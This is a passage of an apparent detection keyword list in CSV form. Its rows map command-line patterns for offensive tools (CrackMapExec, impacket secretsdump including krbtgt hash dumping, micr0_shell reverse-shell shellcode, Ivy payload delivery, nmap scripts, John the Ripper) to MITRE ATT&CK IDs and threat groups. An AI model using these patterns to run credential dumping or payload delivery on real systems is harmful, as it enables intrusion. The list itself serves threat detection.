- T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/Mayyhem/SharpSCCM/,1,0,N/A,N/A,5,412,53,2023-09-16T17:33:11Z,2021-08-19T05:09:19Z -* invoke_sessiongopher*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* invoke_vnc*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* --ip * --port * --type cmd --language *,offensive_tool_keyword,micr0_shell,micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.,T1059.003 - T1027.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/senzee1984/micr0_shell,1,0,N/A,9,1,91,12,2023-09-16T02:35:28Z,2023-08-13T02:46:51Z -* -ip * -smb2support *lwpshare* ,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* -IP * -SpooferIP * -HTTP N*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,0,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -* --ip * --variable shellcode *,offensive_tool_keyword,micr0_shell,micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.,T1059.003 - T1027.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/senzee1984/micr0_shell,1,0,N/A,9,1,91,12,2023-09-16T02:35:28Z,2023-08-13T02:46:51Z -* ip-forwarding.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ip-geolocation-geoplugin.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ip-geolocation-ipinfodb.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ip-geolocation-map-bing.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ip-geolocation-map-google.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ip-geolocation-map-kml.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ip-geolocation-maxmind.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ip-https-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ipidseq.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ipmi-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ipmi-cipher-zero.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ipmi-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ipv6-multicast-mld-list.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ipv6-node-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ipv6-ra-flood.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* irc-botnet-channels.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* irc-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* irc-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* irc-sasl-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* irc-unrealircd-backdoor.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -isbeacon *,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -* iscsi-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* iscsi-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* isns-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --isroca --publickey *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -it bloodhound*,offensive_tool_keyword,bloodhound,A Python based ingestor for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/fox-it/BloodHound.py,1,0,N/A,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -* -Ix64 *.bin -Ix86 *.bin -P Inject -O *.png -stageless*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,0,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -* -Ix64 *.bin -Ix86 *.bin -P Local -O *.hta -url http:* -delivery hta -stageless*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,0,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -* -Ix64 *.bin -Ix86 *.bin -P Local -O *.js -url http* -delivery bits -stageless*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,0,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -* -Ix64 *.bin -Ix86 *.bin -P Local -O *.txt -url http* -delivery macro -stageless*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,0,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -* -Ix64 *.bin -Ix86 *.bin -P Local -O *.xsl -url http* -delivery xsl -stageless*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,0,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -* -Ix64 *.c -Ix86 *.c -P Local -O *.js*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,0,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -* -Ix64 *.vba -Ix86 *.vba -P Inject -O *,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,0,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -* -jar ipscan.exe*,greyware_tool_keyword,ipscan,Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/angryip/ipscan,1,0,N/A,7,10,3517,683,2023-09-11T16:36:25Z,2011-06-28T20:58:48Z -* jdwp-exec.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* jdwp-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* jdwp-inject.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* jdwp-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -JMXConsole -AppName *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Exploit-JBoss.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* john_done*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* john_fork*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* john_load*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* john_load_conf*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* john_load_conf_db*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* john_log_format*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* john_log_format2*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* john_mpi_wait*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* john_omp_fallback*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* john_omp_init*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* john_omp_maybe_adjust_or_fallback*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* john_omp_show_info*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* john_register_all*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* john_register_one*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* john_run*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* john_set_mpi*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* john_set_tristates*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* john_wait*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* JohnTheRipper/*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* JspShell ua*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -* -just-dc-ntlm *,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* -just-dc-user *,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* -just-dc-user 'krbtgt' -dc-ip * -k -no-pass 